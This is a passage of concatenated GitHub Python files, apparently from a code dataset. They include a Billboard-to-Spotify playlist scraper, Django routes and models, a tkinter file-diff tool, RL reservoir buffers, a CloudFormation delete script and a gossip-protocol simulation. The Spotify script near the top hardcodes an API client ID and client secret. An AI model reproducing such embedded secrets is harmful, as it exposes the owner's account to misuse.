requests\n\nurl=\"https://www.billboard.com/charts/hot-100/\"\n\ndate=input(\"what year you would like to travel to in YYY-MM-DD\")\n#**********************************************Code Dealing with Getting authenticated with Spotify API*************************************\nCLIENT_ID=\"29b4aa34873d43e7a5fb0133a098c832\"\nCLIENT_SECRET=\"63c8b9a9dbe747f8814d4143b83c56be\"\n\nscope = \"playlist-modify-private\"\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=CLIENT_ID,client_secret=CLIENT_SECRET,redirect_uri=\"http://example.com\",scope=scope))\n\nUSER_ID=sp.current_user()['display_name']\n\n#********************************************Code Dealing with Getting Billiboard Data In desirable form************************************\nresponse=requests.get(url=url+date)\nwebpage=response.text\n\nsoup=BeautifulSoup(webpage,\"html.parser\")\nraw_songs=soup.find_all(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title\")\n\nsongs=[song.getText() for song in raw_songs]\ndel songs[0:6]\nstart=1\nend=start+3\nwhile (end \" + adjacent_vertex)\n\n\ndef build_graph(directed):\n g = Graph(directed)\n vertices = []\n for val in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n vertex = Vertex(val)\n vertices.append(vertex)\n g.add_vertex(vertex)\n\n for v in range(len(vertices)):\n v_idx = randrange(0, len(vertices) - 1)\n v1 = vertices[v_idx]\n v_idx = randrange(0, len(vertices) - 1)\n v2 = vertices[v_idx]\n g.add_edge(v1, v2, randrange(1, 10))\n\n print_graph(g)\n\nbuild_graph(False)\n","repo_name":"KevMantis/python_practice","sub_path":"graphs/graphs1_intro.py","file_name":"graphs1_intro.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16784743781","text":"from pathlib import Path\nimport datetime\n\nfrom tqdm import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\ndef make_plots(datapath, measures, show=False):\n\n # get the data\n pkl_files = list(Path(datapath).glob(\"*.pkl\"))\n if len(pkl_files) == 0:\n print(f\"No files found in '{datapath}'\")\n exit()\n \n # make a unique save folder\n savepath = Path(f\"output/figures/{datapath.stem}\")\n # savepath = Path(f\"deepCA/figures/{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}\")\n savepath.mkdir(parents=True, exist_ok=True)\n \n # join datasets from datapath folder\n df = pd.concat(\n [pd.read_pickle(f) for f in pkl_files],\n axis=0,\n join=\"outer\",\n # ignore_index=True,\n keys=[f.stem for f in pkl_files],\n )\n\n print(\"Matrices =\", len(df[\"filename\"].unique()))\n\n # delete \"Real_Network\" (duplicate of \"Real Network\")\n delete_idxs = df[ df[\"filename:topology_type\"] == \"Real_Network\"].index\n df.drop(delete_idxs, inplace=True)\n\n for dataset in df[\"dataset\"].unique(): # look though all datasets\n for forecast in df[\"forecast\"].loc[(df[\"dataset\"] == dataset)].unique(): # look though all forecast levels for each dataset type\n for measure in measures: # looks through all given quality measures\n\n # make plot\n ax = sns.boxplot(\n x=\"filename:topology_type\",\n y=measure,\n hue=\"filename:sr\",\n data=df.loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ],\n order=np.sort(df[\"filename:topology_type\"].unique()),\n hue_order=np.sort(df[\"filename:sr\"].unique()),\n )\n\n # include hyperparameters and mean in title\n leak_rate = df[\"leak_rate\"].iat[0]\n input_scaling = df[\"input_scaling\"].iat[0]\n input_conn = df[\"input_connectivity\"].iat[0]\n regularization = df[\"regularization\"].iat[0]\n mean = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].mean()\n max = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].max()\n min = df[measure].loc[\n (df[\"dataset\"] == dataset) &\n (df[\"forecast\"] == forecast),\n ].min()\n # print(measure, dataset, forecast, mean, max, min)\n\n # esthetics\n ax.set(\n title=f\"leak_rate={leak_rate}, input_scaling={input_scaling}, input_conn={input_conn}, reg={regularization}\\ndataset={dataset}, forecast={forecast}, avg. {measure}={mean:.2f}, max={max:.2f}, min={min:.2f}\",\n xlabel=\"Topology type\",\n ylabel=measure.upper(),\n yticks=(0, 0.5, 1),\n )\n ax.set_ylim(0, 1)\n\n ax.legend(\n title=\"Spectral radius\",\n )\n\n # save and/or display\n fig = ax.get_figure()\n fig.set_size_inches(12, 6)\n fig.savefig(Path(f\"{savepath}/{measure}-{dataset}-{forecast}\"))\n if show:\n plt.show()\n plt.close()\n\n# make plots\nif __name__ == \"__main__\":\n make_plots(\n Path(\"output\\data\\demo\"),\n measures=[\"r2\", \"nrmse\"])","repo_name":"wehak/deepCA_reservoirpy","sub_path":"plot_scripts/batch_plot_accuracy_results.py","file_name":"batch_plot_accuracy_results.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29928584257","text":"from django.urls import path\nfrom . import views\nfrom . import apis\n#every page name and roots\nurlpatterns = [\n path('',views.index,name=\"indexpage\"),\n path('checking', views.checking, name='checking'),\n # path('sign',views.sign,name=\"signup_back\"),\n # path('login',views.login,name=\"signup_back\"),\n path('auth-login-basic',views.auth_login_basic,name='log_front'),\n path('auth-register-basic',views.auth_register_basic,name='log_front'),\n path('data',views.data,name='data'),\n path('selected',apis.selected,name=\"sources\"),\n path('login',apis.login,name='login'),\n path('sign',apis.sign,name='sign')\n]","repo_name":"krunalpabari13/Python_project","sub_path":"log/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42644550446","text":"\r\n\r\nfrom tkinter import Tk\r\nfrom tkinter import Button\r\nfrom tkinter.filedialog import *\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import showerror\r\n\r\nclass Data:\r\n def __init__(self):\r\n self.keyList=[]\r\n self.info={}\r\n def setKey(self,key):\r\n self.keyList.append(key)\r\n def setKeyData(self,key,value):\r\n self.info[key]=value\r\n\r\n def getKey(self,key):\r\n return self.info.get(key)\r\nclass WorkPanel():\r\n def __init__(self,root):\r\n self.root=root\r\n self.fileOne=None\r\n self.fileTwo=None\r\n self.initView()\r\n def initView(self):\r\n self.root.geometry('1000x700')\r\n self.root.title(\"文件对比工具\")\r\n\r\n btn1=Button(self.root,text=\"选择文件一\")\r\n\r\n btn1.grid(row=0,column=0,sticky=W)\r\n # btn1.place(x=0,y=10)\r\n\r\n btn2 = Button(self.root, text=\"选择文件二\")\r\n # btn2.place(x=80, y=10)\r\n btn2.grid(row=0,column=1)\r\n\r\n btn3 = Button(self.root, text=\"比较\")\r\n # btn3.place(x=160, y=10)\r\n btn3.grid(row=0,column=2)\r\n\r\n btn4 = Button(self.root, text=\"清空内容\")\r\n btn4.grid(row=0,column=3)\r\n # btn4.place(x=240, y=10)\r\n\r\n btn2[\"command\"]=lambda btnName=\"btn2\":self.doAction(btnName)\r\n btn1[\"command\"]=lambda btnName=\"btn1\":self.doAction(btnName)\r\n btn3[\"command\"] = lambda btnName=\"btn3\": self.doAction(btnName)\r\n btn4[\"command\"] = lambda btnName=\"btn4\": self.doAction(btnName)\r\n\r\n self.lb1=Label(self.root,text=\"文件一路径:\")\r\n self.lb1.grid(row=1,column=0,padx=5,sticky=W)\r\n self.lb2=Label(self.root,text=\"文件二路径:\")\r\n self.lb2.grid(row=2,column=0,padx=5,sticky=W)\r\n\r\n s1= Scrollbar(root)\r\n s2=Scrollbar(root)\r\n self.t1=Text(self.root,height=45,width=70)\r\n self.t1.grid(row=4,column=0,columnspan=6,padx=5)\r\n self.t1.insert(1.0,\"文件一内容:\\n\")\r\n\r\n self.t2=Text(self.root,height=45,width=70)\r\n s1.grid(row=4,column=7,sticky=N+S+W+E)\r\n self.t2.grid(row=4,column=6,columnspan=6,padx=5)\r\n self.t2.insert(1.0,\"文件二内容:\\n\")\r\n s2.grid(row=4,column=13,sticky=N+S+W+E)\r\n self.t1.config(yscrollcommand=s1.set)\r\n s1.config(command=self.t1.yview)\r\n\r\n self.t2.config(yscrollcommand=s2.set)\r\n s2.config(command=self.t2.yview)\r\n def doAction(self,btnName):\r\n if btnName==\"btn1\":\r\n self.fileOne=fileOne=askopenfilename()\r\n if not fileOne:return\r\n self.lb1[\"text\"]=self.lb1[\"text\"]+\" \"+fileOne\r\n if btnName==\"btn2\":\r\n self.fileTwo=fileTwo = askopenfilename()\r\n if not fileTwo: return\r\n self.lb2[\"text\"]=self.lb2[\"text\"]+\" \"+fileTwo\r\n\r\n if btnName==\"btn3\":\r\n if not self.fileOne and not self.fileTwo:\r\n showerror(\"error\",\"请选择两个文件进行对比\")\r\n self.sortValue(self.fileOne,self.fileTwo)\r\n\r\n if btnName==\"btn4\":\r\n self.t1.delete(0.0,END)\r\n self.t2.delete(0.0, END)\r\n\r\n self.t1.insert(1.0, \"文件一内容:\\n\")\r\n self.t2.insert(1.0, \"文件二内容:\\n\")\r\n\r\n def replace(self,value):\r\n value=value.replace(\"”\",\"\")\r\n value=value.replace(\"“\",\"\")\r\n value=value.replace(\"\\\"\",\"\")\r\n return value.strip()\r\n def getData(self,fileObj,data):\r\n with open(fileObj,\"r\",encoding=\"utf-8\") as f1:\r\n for line in f1:\r\n if \"#\" in line or \"//\" in line:continue\r\n if len(line.split(\"=\"))<=1:continue\r\n key=line.split(\"=\")[0]\r\n value=line.split(\"=\")[1]\r\n key=self.replace(key)\r\n value=self.replace(value)\r\n data.setKey(key)\r\n data.setKeyData(key,value)\r\n def sortValue(self,fileOne,fileTwo):\r\n self.first=Data()\r\n self.two=Data()\r\n self.getData(fileOne,self.first)\r\n self.getData(fileTwo,self.two)\r\n self.showSame()\r\n def showSame(self):\r\n self.sameOne=self.first.keyList\r\n self.sameTwo=self.two.keyList\r\n keySame=set(self.sameOne).intersection(self.sameTwo)\r\n differentOne=set(self.sameOne).difference(self.sameTwo)\r\n differentTwo=set(self.sameTwo).difference(self.sameOne)\r\n self.t1.tag_config('a', foreground='red')\r\n self.t1.tag_config('b', foreground='blue')\r\n\r\n self.t2.tag_config('a', foreground='red')\r\n self.t2.tag_config('b', foreground='blue')\r\n\r\n self.t1.insert(END, \"==========================相同的===============================\\n\")\r\n self.t2.insert(END, \"==========================相同的==============================\\n\")\r\n scroll1 = Scrollbar()\r\n scroll2 =Scrollbar()\r\n # scroll1.place(x=10,y=10)\r\n scroll1.config(command=self.t1.yview) # 将文本框关联到滚动条上,滚动条滑动,文本框跟随滑动\r\n self.t1.config(yscrollcommand=scroll1.set)\r\n\r\n scroll1.config(command=self.t2.yview) # 将文本框关联到滚动条上,滚动条滑动,文本框跟随滑动\r\n self.t2.config(yscrollcommand=scroll2.set)\r\n\r\n for same in keySame:\r\n value=\"\\\"{}\\\"\".format(same)\r\n self.t1.insert(END,value,\"b\")\r\n self.t1.insert(END, \"= \\\"{}\\\"\\n\".format(self.first.getKey(same)))\r\n self.t2.insert(END, value, \"b\")\r\n self.t2.insert(END, \"= \\\"{}\\\"\\n\".format(self.two.getKey(same)))\r\n\r\n\r\n\r\n self.t1.insert(END, \"===========================不相同的===============================\\n\")\r\n self.t2.insert(END, \"==========================不相同的================================\\n\")\r\n\r\n\r\n for difA in differentOne:\r\n value = \"\\\"{}\\\"\".format(difA)\r\n self.t1.insert(END, value, \"a\")\r\n self.t1.insert(END, \"= \\\"{}\\\"\\n\".format(self.first.getKey(difA)))\r\n\r\n for difB in differentTwo:\r\n value = \"\\\"{}\\\"\".format(difB)\r\n self.t2.insert(END, value, \"a\")\r\n self.t2.insert(END, \"= \\\"{}\\\"\\n\".format(self.two.getKey(difB)))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n root=Tk()\r\n work=WorkPanel(root)\r\n root.mainloop()","repo_name":"heyonly/Translate","sub_path":"Translate/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11004918464","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\nimport argparse\nfrom voc import make_voc\nfrom yolo import make_yolo\nfrom coco import make_coco\n\nif __name__==\"__main__\":\n\n parser=argparse.ArgumentParser()\n parser.add_argument(\"--detected_dir\",type=str,help=\"the directory of detection results\",default=\"/home/b_xi/Detection\")\n parser.add_argument(\"--image_path\",type=str,help=\"the directory of original images\",default=\"/home/b_xi/car8\")\n parser.add_argument(\"--saved_dir\",type=str,help=\"the directory you want to save the converted result\",default=\"/home/b_xi/VOC2007\")\n parser.add_argument(\"--train_percent\",type=float,default=0.9)\n parser.add_argument(\"--convert_to\",type=str,default='coco',help=\"the format you want to save to\")\n args = parser.parse_args()\n\n if args.convert_to == \"voc\":\n make_voc(args)\n if args.convert_to==\"yolo\":\n make_yolo(args)\n if args.convert_to==\"coco\":\n make_coco(args)\n\n\n\n","repo_name":"BoXiao123/label_image","sub_path":"img_label_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"42083128680","text":"import numpy as np\r\nimport random\r\nfrom ray.rllib.utils.annotations import DeveloperAPI\r\nfrom ray.rllib.utils.compression import unpack_if_needed\r\nfrom ray.rllib.execution.replay_ops import SimpleReplayBuffer\r\n\r\n\r\n@DeveloperAPI\r\nclass ReservoirBuffer:\r\n @DeveloperAPI\r\n def __init__(self, size):\r\n \"\"\"Create Reservoir buffer.\r\n Inspired to ray.rllib.optimizers.replay_buffer.ReplayBuffer\r\n Parameters\r\n ----------\r\n size: int\r\n Max number of transitions to store in the buffer. When the buffer\r\n overflows the old memories are dropped.\r\n \"\"\"\r\n self._storage = []\r\n self._maxsize = size\r\n self._next_idx = 0\r\n self._hit_count = np.zeros(int(size))\r\n self._num_added = 0\r\n self._num_sampled = 0\r\n self._episodes_registry = {}\r\n\r\n def __len__(self):\r\n return len(self._storage)\r\n\r\n @DeveloperAPI\r\n def add(self, obs_t, action, eps_id=None):\r\n data = (obs_t, action)\r\n self._num_added += 1\r\n\r\n if len(self._storage) < self._maxsize:\r\n self._storage.append(data)\r\n\r\n else:\r\n idx = np.random.randint(0, self._num_added + 1)\r\n if idx < self._maxsize:\r\n self._storage[idx] = data\r\n\r\n def _encode_sample(self, idxes):\r\n obses_t, actions = [], []\r\n for i in idxes:\r\n data = self._storage[i]\r\n obs_t, action = data\r\n obses_t.append(np.array(unpack_if_needed(obs_t), copy=False))\r\n actions.append(np.array(action, copy=False))\r\n\r\n self._hit_count[i] += 1\r\n return np.array(obses_t), np.array(actions)\r\n\r\n @DeveloperAPI\r\n def sample_idxes(self, batch_size):\r\n return np.random.randint(0, len(self._storage), batch_size)\r\n\r\n @DeveloperAPI\r\n def sample_with_idxes(self, idxes):\r\n self._num_sampled += len(idxes)\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def sample(self, batch_size):\r\n \"\"\"Sample a batch of experiences.\r\n Parameters\r\n ----------\r\n batch_size: int\r\n How many transitions to sample.\r\n Returns\r\n -------\r\n obs_batch: np.array\r\n batch of observations\r\n act_batch: np.array\r\n batch of actions executed given obs_batch\r\n \"\"\"\r\n idxes = [\r\n random.randint(0,\r\n len(self._storage) - 1) for _ in range(batch_size)\r\n ]\r\n self._num_sampled += batch_size\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def stats(self, debug=False):\r\n data = {\r\n \"added_count\": self._num_added,\r\n \"sampled_count\": self._num_sampled,\r\n \"num_entries\": len(self._storage),\r\n }\r\n return data\r\n\r\n\r\nclass MultiAgentReservoirBuffer:\r\n \"\"\"\r\n Class for multi-agent reservoir buffer.\r\n parameters\r\n \"\"\"\r\n def __init__(self, size, policies):\r\n self.buffers = {}\r\n self.steps = {}\r\n self.fake = []\r\n self.policies = policies\r\n for policy_id in policies.keys():\r\n self.buffers[policy_id] = ReservoirBuffer(size)\r\n self.steps[policy_id] = 0\r\n\r\n\r\n@DeveloperAPI\r\nclass SimpleReservoirBuffer:\r\n @DeveloperAPI\r\n def __init__(self, size):\r\n \"\"\"Create Reservoir buffer.\r\n Inspired to ray.rllib.optimizers.replay_buffer.ReplayBuffer\r\n Parameters\r\n ----------\r\n size: int\r\n Max number of transitions to store in the buffer. When the buffer\r\n overflows the old memories are dropped.\r\n \"\"\"\r\n self._storage = []\r\n self._eps_dict = {}\r\n self._maxsize = size\r\n self._next_idx = 0\r\n self._hit_count = np.zeros(int(size))\r\n self._num_added = 0\r\n self._num_sampled = 0\r\n self._episodes_registry = {}\r\n\r\n def __len__(self):\r\n return len(self._storage)\r\n\r\n @DeveloperAPI\r\n def add(self, episode_sample, eps):\r\n if eps in self._episodes_registry:\r\n idx = self._episodes_registry[eps]\r\n ss = self._storage[idx][0]\r\n out_batch = []\r\n for k in range(len(ss)):\r\n if episode_sample[k] is None:\r\n if ss[k] is None:\r\n out_batch.append(None)\r\n else:\r\n out_batch.append(ss[k])\r\n else:\r\n if ss[k] is None:\r\n out_batch.append(episode_sample[k].compress(bulk=True))\r\n else:\r\n ss[k].decompress_if_needed()\r\n episode_sample[k].decompress_if_needed()\r\n b = ss[k].concat(episode_sample[k])\r\n b.compress(bulk=True)\r\n out_batch.append(b)\r\n self._storage[idx] = (out_batch, eps)\r\n\r\n else:\r\n self._num_added += 1\r\n if len(self._storage) < self._maxsize:\r\n self._storage.append((episode_sample, eps))\r\n self._episodes_registry[eps] = len(self._storage) - 1\r\n\r\n else:\r\n idx = np.random.randint(0, self._num_added + 1)\r\n if idx < self._maxsize:\r\n episode_out = self._storage[idx][1]\r\n self._episodes_registry.pop(episode_out)\r\n self._storage[idx] = (episode_sample, eps)\r\n self._episodes_registry[eps] = idx\r\n\r\n def _encode_sample(self, idxes):\r\n obses_t, actions = [], []\r\n for i in idxes:\r\n data = self._storage[i]\r\n obs_t, action = data\r\n obses_t.append(np.array(unpack_if_needed(obs_t), copy=False))\r\n actions.append(np.array(action, copy=False))\r\n\r\n self._hit_count[i] += 1\r\n return np.array(obses_t), np.array(actions)\r\n\r\n @DeveloperAPI\r\n def sample_idxes(self, batch_size):\r\n return np.random.randint(0, len(self._storage), batch_size)\r\n\r\n @DeveloperAPI\r\n def sample_with_idxes(self, idxes):\r\n self._num_sampled += len(idxes)\r\n return self._encode_sample(idxes)\r\n\r\n @DeveloperAPI\r\n def sample(self, batch_size):\r\n \"\"\"Sample a batch of experiences.\r\n Parameters\r\n ----------\r\n batch_size: int\r\n How many transitions to sample.\r\n Returns\r\n -------\r\n obs_batch: np.array\r\n batch of observations\r\n act_batch: np.array\r\n batch of actions executed given obs_batch\r\n \"\"\"\r\n observations = []\r\n actions = []\r\n in_episode_samples = batch_size\r\n episode_size = int(batch_size/in_episode_samples)\r\n for i in range(episode_size):\r\n episode_idx = random.randint(0, len(self._storage)-1)\r\n while any([x==None for x in self._storage[episode_idx][0]]):\r\n episode_idx = random.randint(0, len(self._storage)-1)\r\n episode_sample = self._storage[episode_idx][0]\r\n for _ in range(in_episode_samples):\r\n obs = []\r\n ac = []\r\n for policy_batch in episode_sample:\r\n policy_batch.decompress_if_needed()\r\n num_samples = policy_batch.count\r\n sample_idx = np.random.randint(0, num_samples)\r\n o = unpack_if_needed(policy_batch['obs'][sample_idx])\r\n a = policy_batch['actions'][sample_idx]\r\n # o = unpack_if_needed(policy[0])\r\n # traj_ids = np.random.randint(0, len(o))\r\n obs.append(o)\r\n ac.append(a)\r\n observations.append(obs)\r\n actions.append(ac)\r\n\r\n return np.array(observations, copy=False).reshape(batch_size, -1),\\\r\n np.array(actions, copy=False).reshape(batch_size, -1)\r\n\r\n\r\nclass MultiAgentSimpleReservoirBuffer:\r\n \"\"\"\r\n Class for multi-agent reservoir buffer.\r\n parameters\r\n \"\"\"\r\n def __init__(self, size, policies):\r\n self.buffers = {}\r\n self.steps = {}\r\n self.policies = policies\r\n for policy_id in policies.keys():\r\n self.buffers[policy_id] = SimpleReservoirBuffer(size)\r\n self.steps[policy_id] = 0\r\n\r\n","repo_name":"fedcacc/SIMS_pytorch","sub_path":"optimizers/reservoir_buffer.py","file_name":"reservoir_buffer.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42622930916","text":"from datetime import datetime\nimport logging\nimport json\nimport sys\n\nimport boto3\nimport botocore\n\n\ncf = boto3.client('cloudformation') # pylint: disable=C0103\nlog = logging.getLogger('deploy.cf.create_or_update')\n\n\ndef main(json_file):\n\n\tjson_data = _parse_json(json_file)\n\n\tstack_name = json_data['Stack']['Properties']['StackName']\n\n\tparams = {\n\t\t'StackName' : stack_name,\n\t\t#'RetainResources' : ,\n\t}\n\ttry:\n\t\tif _stack_exists(stack_name):\n\t\t\tprint('Deleting {}'.format(stack_name))\n\t\t\tstack_result = cf.delete_stack(**params)\n\t\t\twaiter = cf.get_waiter('stack_delete_complete')\n\t\t\t\n\t\telse:\n\t\t\tprint('No Stack!!!')\n\t\t\treturn\n\n\t\tprint(\"...waiting for stack to be ready...\")\n\t\twaiter.wait(StackName=stack_name)\n\n\n\texcept botocore.exceptions.ClientError as ex:\n\t\terror_message = ex.response['Error']['Code']\n\t\tprint(\"Error Code: {} \".format(error_message))\n\n\t\traise\n\n\t\t#if error_message == 'No updates are to be performed.':\n\t\t#\tprint(\"No changes\")\n\t\t#else:\n\t\t#\traise\n\telse:\n\t\tprint('{} Stack Delete!!!'.format(stack_name))\n\t\t\"\"\"\n\t\tprint(json.dumps(\n\t\t\tcf.describe_stacks(\n\t\t\t\tStackName=stack_result['StackId']),\n\t\t\t\tindent=2,\n\t\t\t\tdefault=json_serial\n\t\t\t)\n\t\t)\n\t\t\"\"\"\n\ndef _parse_json(json_file):\n\twith open(json_file) as json_fileobj:\n\t\tjson_data = json.load(json_fileobj)\n\treturn json_data\n\n\ndef _stack_exists(stack_name):\n\tstacks = cf.list_stacks()['StackSummaries']\n\tfor stack in stacks:\n\t\tif stack['StackStatus'] == 'DELETE_COMPLETE':\n\t\t\tcontinue\n\t\tif stack_name == stack['StackName']:\n\t\t\treturn True\n\treturn False\n\n\ndef json_serial(obj):\n\t\"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n\tif isinstance(obj, datetime):\n\t\tserial = obj.isoformat()\n\t\treturn serial\n\traise TypeError(\"Type not serializable\")\n\n\nif __name__ == '__main__':\n\tmain(*sys.argv[1:])\n","repo_name":"heyoon2j/cloudformation-ansible","sub_path":"boto3/cloudformation/cf_delete.py","file_name":"cf_delete.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12641307186","text":"import typing\n\nimport django.core.serializers.json\nfrom django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import gettext_lazy as _\n\nfrom tulius.forum.comments import models as comment_models\n\nUser = get_user_model()\n\n\nclass AbstractCommentLike(models.Model):\n class Meta:\n verbose_name = _('comment like')\n verbose_name_plural = _('comments likes')\n abstract = True\n\n objects = models.Manager() # linter, be happy\n\n user = models.ForeignKey(\n User, models.PROTECT,\n null=False,\n blank=False,\n related_name='liked_comments',\n verbose_name=_('user'),\n )\n comment = models.ForeignKey(\n comment_models.Comment, models.PROTECT,\n null=False,\n blank=False,\n related_name='liked',\n verbose_name=_('comment'),\n )\n data: typing.Dict = models.JSONField(\n default=dict,\n encoder=django.core.serializers.json.DjangoJSONEncoder)\n\n\nclass CommentLike(AbstractCommentLike):\n pass\n\n\nclass AbstractVotingVote(models.Model):\n \"\"\"\n Voting choice\n \"\"\"\n class Meta:\n verbose_name = _('voting vote')\n verbose_name_plural = _('voting votes')\n unique_together = ('user', 'comment')\n abstract = True\n\n choice = models.IntegerField(\n blank=False,\n null=False,\n verbose_name=_('choice')\n )\n user = models.ForeignKey(\n User, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('user'),\n related_name='voting_votes',\n )\n comment = models.ForeignKey(\n comment_models.Comment, models.PROTECT,\n null=False,\n blank=False,\n related_name='votes',\n verbose_name=_('comment'),\n )\n\n def __str__(self):\n return f'{self.comment.title} - {self.choice}({self.user})'\n\n\nclass VotingVote(AbstractVotingVote):\n pass\n","repo_name":"kozzztik/tulius","sub_path":"tulius/forum/other/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"71949944245","text":"import simulus, random, argparse, textwrap, math, time\n\nst = time.time()\ndef BLOCK_LOW(id,p,n): return int(id*n/p)\ndef BLOCK_HIGH(id,p,n): return BLOCK_LOW(id+1,p,n)-1\ndef BLOCK_SIZE(id,p,n): return BLOCK_LOW(id+1)-BLOCK_LOW(id)\ndef BLOCK_OWNER(index,p,n): return int((p*(index+1)-1)/n)\n\ntimeout1 = 1\ntimeout2 = 2\n\nclass msg2:\n def __init__(self,type,m,mID,round,sender):\n self.type = type\n self.payload = m\n self.ID = int(mID)\n self.round = int(round)\n self.sender = int(sender)\n\nclass node(object):\n def __init__(self, sim, idx,total_nodes,lookahead):\n self.lookahead = lookahead\n self.sim = sim\n self.total_nodes = total_nodes\n self.node_idx = idx\n self.eagerPushPeers = []\n self.lazyPushPeers = []\n self.lazyQueues = []\n self.missing = []\n self.receivedMsgs = {}\n self.timers = {}\n self.mbox = sim.mailbox(name='mb%d'%idx, min_delay=lookahead)\n sim.process(self.receive)\n\n def eagerPush(self,msg, mID, round, sender):\n c = 0\n for n in self.eagerPushPeers:\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n if n != sender:\n c+=1\n self.sim.sync().send(self.sim, 'mb%d'% n, ('GOSSIP-'+msg+'-'+str(mID)+'-'+str(round)+'-'+str(self.node_idx)),delay*c)\n\n def lazyPush(self,msg, mID, round, sender):\n for n in self.lazyPushPeers:\n if n != sender:\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n m = 'IHAVE-'+\"\"+'-'+str(mID)+'-'+str(round)+'-'+str(self.node_idx)\n self.sim.sync().send(self.sim, 'mb%d'% n, m,delay)\n\n def msg(type,m,mID,round,sender):\n return \"%s-%s-%d-%d-%d\"%(type,m,mID,round,sender)\n\n def receive(self):\n self.eagerPushPeers = self.getPeers()\n v = 1\n while v == 1:\n m = self.mbox.recv(isall=False)\n m2 = m.split(\"-\")\n msg = msg2(m2[0],m2[1],m2[2],m2[3],m2[4])\n print(\"%g: '%s' rcvd msg '%s' %d round:%d\" % (self.sim.now, self.sim.name, msg.type,msg.sender,msg.round))\n if msg.type =='PRUNE':\n if msg.sender in self.eagerPushPeers:\n self.eagerPushPeers.remove(msg.sender)\n if msg.sender not in self.lazyPushPeers:\n self.lazyPushPeers.append(msg.sender)\n\n elif msg.type =='IHAVE':\n if msg.ID not in self.receivedMsgs.keys():\n # setup timer\n self.missing.append((msg.ID,msg.sender,msg.round))\n if msg.ID not in self.timers.keys():\n self.timers[msg.ID] = self.sim.sched(self.timer,until=self.sim.now+self.lookahead,mID=msg.ID)\n\n\n elif msg.type =='GRAFT':\n if msg.sender not in self.eagerPushPeers:\n self.eagerPushPeers.append(msg.sender)\n if msg.sender in self.lazyPushPeers:\n self.lazyPushPeers.remove(msg.sender)\n if msg.ID in self.receivedMsgs.keys():\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n msgS = ('GOSSIP-'+self.receivedMsgs[msg.ID]+'-'+str(msg.ID)+'-'+str(msg.round)+'-'+str(self.node_idx))\n self.sim.sync().send(self.sim, 'mb%d'% msg.sender, msgS,delay)\n\n elif msg.type =='GOSSIP':\n if msg.ID not in self.receivedMsgs.keys():\n self.receivedMsgs[msg.ID] = msg.payload\n\n if msg.ID in self.timers.keys():\n #print(\"timer cancel\")\n self.sim.cancel(self.timers[msg.ID])\n self.timers.pop(msg.ID)\n\n self.eagerPush(msg.payload,msg.ID,msg.round+1,self.node_idx)\n self.lazyPush(msg.payload,msg.ID,msg.round+1,self.node_idx)\n\n if msg.sender not in self.eagerPushPeers:\n self.eagerPushPeers.append(msg.sender)\n if msg.sender in self.lazyPushPeers:\n self.lazyPushPeers.remove(msg.sender)\n else:\n if msg.sender in self.eagerPushPeers:\n self.eagerPushPeers.remove(msg.sender)\n if msg.sender not in self.lazyPushPeers:\n self.lazyPushPeers.append(msg.sender)\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n self.sim.sync().send(self.sim, 'mb%d'% msg.sender, ('PRUNE--0-0-'+str(self.node_idx)),delay)\n\n elif msg.type =='BROADCAST':\n mID = msg.ID\n self.eagerPush(msg.payload,mID,0,self.node_idx)\n self.lazyPush(msg.payload,mID,0,self.node_idx)\n self.receivedMsgs[mID] = msg.payload\n\n def timer(self,**args):\n mID = args[\"mID\"]\n #print(str(self.sim.now)+\"------started timer for mID:\"+str(mID)+\" on node \"+str(self.node_idx))\n m = (mID,0,0)\n for p in self.missing:\n if p[0] == mID:\n m = p\n self.missing.remove(p)\n if m[1] not in self.eagerPushPeers:\n self.eagerPushPeers.append(m[1])\n if m[1] in self.lazyPushPeers:\n self.lazyPushPeers.remove(m[1])\n #delay = self.sim.rng().expovariate(1)+self.lookahead\n delay = self.lookahead\n msg = ('GRAFT--'+str(mID)+'-'+str(m[2])+'-'+str(self.node_idx))\n self.sim.sync().send(self.sim, 'mb%d'% m[1], msg,delay)\n self.timers[mID] = self.sim.sched(self.timer,**args, offset=timeout2)\n\n def getPeers(self):\n 